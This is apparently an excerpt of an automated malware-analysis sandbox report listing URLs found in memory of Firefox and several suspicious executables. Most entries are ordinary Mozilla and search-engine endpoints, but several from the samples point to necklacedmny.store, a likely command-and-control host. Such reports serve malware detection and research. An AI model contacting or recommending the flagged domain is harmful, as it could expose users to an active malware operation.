Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comlogowordmark.alwaysVisiblenewNewtabExperience.colorsextensions.pocket.en
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 0000002E.00000003.2988145468.0000020F2F7E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1403293
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000002E.00000003.3006812484.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2979347381.0000020F2CA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3010408169.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drafts.csswg.org/css-lists-3/#ua-stylesheet
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2900846239.0000025E4238C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000002E.00000003.3061422895.0000020F386FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000002E.00000003.3060467793.0000020F3AC5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/ActivityStreamMe
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/XPCOMUtils.sys.mjs
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/XPCOMUtils.sys.mjschrome://gl
Source: firefox.exe, 0000002E.00000003.3053774318.0000020F382CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000002E.00000003.3053774318.0000020F382CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/1072
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/discoverystream.personalization.enabledresource://nimbus/Exper
Source: firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000002.2932128135.0000012157372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41C86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3022867414.0000020F30AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000002E.00000003.3022867414.0000020F30AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestPreferences/this._firefoxSuggestScenarioStartupPro
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000002E.00000003.2988145468.0000020F2F7E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: efe6fe4127.exe, 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2895550351.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2932514636.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2937020002.00000000062C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.2232447339.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/3
Source: efe6fe4127.exe, 0000000C.00000003.2922319367.0000000001A75000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2922893958.0000000001A77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/6
Source: efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/G
Source: efe6fe4127.exe, 00000009.00000003.2713360207.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/JV
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/K
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/S
